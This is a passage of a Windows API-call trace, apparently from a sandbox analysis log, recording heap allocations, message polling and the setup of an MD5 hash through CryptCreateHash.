[0252.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0252.545] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0252.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0252.545] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0252.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0252.545] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.545] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.545] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0252.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0252.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.546] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0252.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0252.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0252.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0252.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0252.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0252.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.549] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0252.549] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.549] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0252.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0252.549] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0252.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0252.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0252.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0252.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.551] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0252.551] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0252.551] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0252.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0252.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0252.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51640, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0252.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.552] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0252.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0252.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0252.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0252.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0252.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0252.553] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0252.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0252.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0252.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0252.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0252.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0252.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0252.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: 